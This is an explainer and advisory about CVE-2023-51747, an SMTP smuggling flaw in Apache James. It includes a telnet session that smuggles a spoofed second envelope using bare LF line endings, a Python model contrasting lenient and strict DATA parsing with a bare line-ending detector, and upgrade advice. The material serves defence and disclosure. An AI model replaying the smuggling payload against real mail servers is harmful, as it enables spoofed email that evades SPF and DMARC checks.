Apache James, a popular open-source email server, recently faced a serious security flaw: CVE-2023-51747. This issue, affecting versions prior to 3.8.1 and 3.7.5, puts your mail server at risk of SMTP smuggling attacks. If you're managing a James server, keep reading: this guide breaks down the problem simply, shows how an attacker could exploit it, and tells you what you should do next.
What’s the Problem?
SMTP smuggling is an attack in which bad actors exploit inconsistencies in how mail servers recognize line endings. In James's case, its lax handling of line delimiters (how it recognizes the end of a message line) allows for "differences in interpretation" between what the sender and the receiver think the email actually contains.
Why does this matter?
This confusion can be abused by attackers to forge the envelope of SMTP messages. That means someone could sneak an email past SPF (Sender Policy Framework) checks, your basic defense against email spoofing and phishing.
Affected versions
Apache James 3.8.x before 3.8.1 (current branch)
Apache James 3.7.x before 3.7.5 (older branch)
If you're running either of these, you are at risk.
How Does the SMTP Smuggling Work?
The issue comes down to how James processes line delimiters during the SMTP DATA command. Email lines are supposed to end with \r\n (CRLF), but James would sometimes accept just \n.
Let’s compare the correct and vulnerable input handling.
Correct (Patched Version – Enforces CRLF)
if (!line.endsWith("\r\n")) {
    // Invalid line ending, reject message
    rejectMessage();
}
Vulnerable (Pre-patch Version – Too Lenient)
if (line.endsWith("\n")) {
    // Accepts LF alone, which is not RFC-compliant
    processLine(line);
}
What can an attacker do?
A hacker can send extra lines or split the message in tricky ways, causing the server to interpret the email differently than security checks (like SPF or DMARC) intended. They might prepend or append their own SMTP envelope data, making the James server relay a spoofed email.
Here's a simplified demo using telnet to connect to a vulnerable James SMTP server:
telnet mail.example.com 25
SMTP commands sent in the session:
EHLO attacker.com
MAIL FROM:<evil@attacker.com>
RCPT TO:<victim@example.com>
DATA
From: Friendly <someone@trusted.com>
To: victim@example.com
Subject: You’ve been tricked
Real message content.
.\nMAIL FROM:<other@spoofed.com>\nRCPT TO:<victim2@example.com>\nDATA\nSpoofed message here.\n.
QUIT
Notice the use of \n instead of \r\n as a line separator. While other security tools might check for standard CRLF (\r\n), the vulnerable versions of James would misinterpret the boundaries, allowing smuggled or spoofed mail to sneak past anti-abuse checks.
The Fix: Strict CRLF Enforcement
The patch to Apache James strictly enforces CRLF (\r\n) as the required line separator for DATA command processing. If a client tries to end a line differently (say just \n), the message is rejected.
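To make the difference between the lenient and the strict reader concrete, here is an added Python model (not Apache James code and not taken from the patch) of the two behaviours contrasted in the snippets above and in the telnet demo: a pre-patch style reader that ends a line at any LF, a patched style reader that accepts only CRLF and rejects bare LF or bare CR, and a small detector that lists bare line endings in a captured DATA payload, as a mail-gateway operator might run over session logs. It goes slightly beyond the article by also treating a bare CR as invalid. The function names are my own and the payloads are constructed for the demo.

```python
"""Added example (not Apache James code): a lenient and a strict reader for
the end of an SMTP DATA payload, plus a detector for bare line endings.
All transcripts in this file are constructed for the demo."""

from typing import Optional

CRLF = b"\r\n"
LF = b"\n"
CR = b"\r"


def find_end_of_data_lenient(stream: bytes) -> Optional[int]:
    """Pre-patch behaviour as the article describes it: every LF ends a line,
    so a lone '.' followed by a bare LF terminates DATA.  Returns the offset
    just past the terminator, or None if no terminator was seen."""
    pos = 0
    while True:
        nl = stream.find(LF, pos)
        if nl == -1:
            return None
        line = stream[pos:nl].rstrip(CR)  # CRLF and bare LF are treated alike
        if line == b".":
            return nl + 1
        pos = nl + 1


def find_end_of_data_strict(stream: bytes) -> Optional[int]:
    """Patched behaviour: only CRLF ends a line, so only '.' CRLF on a line of
    its own terminates DATA.  A bare LF or bare CR anywhere in the payload is a
    protocol violation and raises ValueError instead of being guessed at."""
    pos = 0
    while True:
        nl = stream.find(CRLF, pos)
        line = stream[pos:] if nl == -1 else stream[pos:nl]
        if LF in line or CR in line:
            bad = pos + min(i for i in (line.find(LF), line.find(CR)) if i != -1)
            raise ValueError(f"bare line ending at offset {bad}")
        if nl == -1:
            return None
        if line == b".":
            return nl + 2
        pos = nl + 2


def bare_line_endings(stream: bytes) -> list:
    """Detection helper: list (offset, kind) for every LF not preceded by CR
    and every CR not followed by LF.  Run it over captured DATA payloads or a
    gateway's raw session log to spot clients probing for lenient parsing."""
    findings = []
    i = 0
    while i < len(stream):
        if stream[i:i + 1] == CR:
            if stream[i + 1:i + 2] == LF:
                i += 2
                continue
            findings.append((i, "bare CR"))
        elif stream[i:i + 1] == LF:
            findings.append((i, "bare LF"))
        i += 1
    return findings


# Constructed payload in the shape of the article's demo: a well-formed body,
# then a lone dot ended by a bare LF, then what looks like a second envelope.
SMUGGLED = (
    b"From: Friendly <someone@trusted.com>\r\n"
    b"Subject: You've been tricked\r\n"
    b"\r\n"
    b"Real message content.\r\n"
    b".\n"
    b"MAIL FROM:<other@spoofed.com>\r\n"
    b"RCPT TO:<victim2@example.com>\r\n"
    b"DATA\r\n"
    b"Spoofed message here.\r\n"
    b".\r\n"
)

# Constructed well-formed payload: every line ends with CRLF.
CLEAN = b"Subject: hi\r\n\r\nReal message content.\r\n.\r\n"


def compare_readers(stream: bytes) -> dict:
    """Run both readers on one payload and summarise where they disagree."""
    lenient_end = find_end_of_data_lenient(stream)
    try:
        strict_end = find_end_of_data_strict(stream)
        strict_error = None
    except ValueError as exc:
        strict_end, strict_error = None, str(exc)
    return {
        "lenient_end": lenient_end,
        "lenient_leftover": stream[lenient_end:] if lenient_end is not None else b"",
        "strict_end": strict_end,
        "strict_error": strict_error,
        "bare_endings": bare_line_endings(stream),
    }


if __name__ == "__main__":
    for name, payload in (("smuggled", SMUGGLED), ("clean", CLEAN)):
        result = compare_readers(payload)
        print(name, result["strict_error"] or "strict: accepted",
              "| lenient leftover:", result["lenient_leftover"][:20])
```

On the constructed payload the lenient reader stops at the bare-LF dot and leaves the bytes from MAIL FROM onward to be read as fresh commands, which is exactly the "different interpretation" the article describes; the strict reader never gets that far because it refuses the payload at the first bare LF. The detector reports the same offset, so the same check can serve both as server-side enforcement and as a log-review signal.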
If you're curious, check the official patch:
Patch link: GitHub Commit for CVE-2023-51747
What Should You Do?
Upgrade immediately.
If you use 3.8.x, upgrade to 3.8.1.
If you use 3.7.x, upgrade to 3.7.5.
Download the latest here:
- Apache James 3.8.1 Release
Further reading:
- Apache Security Advisory for CVE-2023-51747
- James Server release notes
- Original patch discussion
- SEC Consult Blog: What is SMTP Smuggling?
Stay updated: Always run supported versions and read security advisories.
Remember: Even small protocol mistakes can create big security risks. Patch your James server today!
Timeline
Published on: 02/27/2024 14:15:27 UTC
Last modified on: 11/13/2024 19:35:09 UTC